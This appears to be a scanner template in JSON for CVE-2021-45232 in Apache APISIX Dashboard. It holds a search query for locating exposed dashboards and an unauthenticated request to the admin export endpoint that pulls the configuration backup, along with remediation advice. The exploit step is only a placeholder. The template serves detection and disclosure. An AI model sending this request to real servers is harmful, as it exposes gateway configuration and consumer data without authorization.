{ "Name": "Apache APISIX Dashboard Unauthorized Access Vulnerability", "Description": "Attackers can access certain interfaces without logging in to Apache APISIX Dashboard, thus making unauthorized changes or obtaining relevant configuration information such as Apache APISIX Route, Upstream, Service, etc., and cause problems such as SSRF, malicious traffic proxies built by attackers, and arbitrary code execution.", "Product": "Apache APISIX", "Homepage": "https://apisix.apache.org/zh/", "DisclosureDate": "2021-12-29", "Author": "su18@javaweb.org", "FofaQuery": "title=\"Apache APISIX Dashboard\"", "GobyQuery": "title=\"Apache APISIX Dashboard\"", "Level": "3", "Impact": "Arbitrary Code execution", "Recommendation": "It is recommended that users change their default user name and password in a timely manner and restrict source IP access to the Apache APISIX Dashboard.", "References": [ "https://nvd.nist.gov/vuln/detail/CVE-2021-45232" ], "Translation": { "CN": { "Name": "Apache APISIX Dashboard 未授权访问漏洞", "VulType": [ "命令执行" ], "Tags": [ "命令执行" ], "Description": "

Apache APISIX 是一个云原生 API 网关。

攻击者无需登录 Apache APISIX Dashboard 即可访问某些接口,从而进行未授权更改或获取 Apache APISIX Route、Upstream、Service 等相关配置信息,并造成 SSRF、攻击者搭建恶意流量代理和任意代码执行等问题。

", "Impact": "

可能造成敏感信息泄露、SSRF、恶意流量代理、任意代码执行等影响。

", "Product": "Apache APISIX", "Recommendation": "

建议用户及时更改默认用户名与密码,并限制来源 IP 访问 Apache APISIX Dashboard。并及时更新至 Apache APISIX Dashboard 2.10.1 及以上版本。

" } }, "Is0day": false, "HasExp": true, "ExpParams": [ { "name": "ip", "type": "input", "value": "your vps ip" }, { "name": "port", "type": "input", "value": "your vps port" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/apisix/admin/migrate/export", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$head", "operation": "contains", "value": "Content-Disposition: attachment; filename=apisix-config.bak", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "Consumers", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/test.php", "follow_redirect": true, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "test", "bz": "" } ] }, "SetVariable": [] } ], "Tags": [ "rce" ], "VulType": [ "rce" ], "CVEIDs": [ "CVE-2021-45232" ], "CNNVD": [ "CNNVD-202112-2629" ], "CNVD": [ "" ], "CVSSScore": "7.3", "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null } }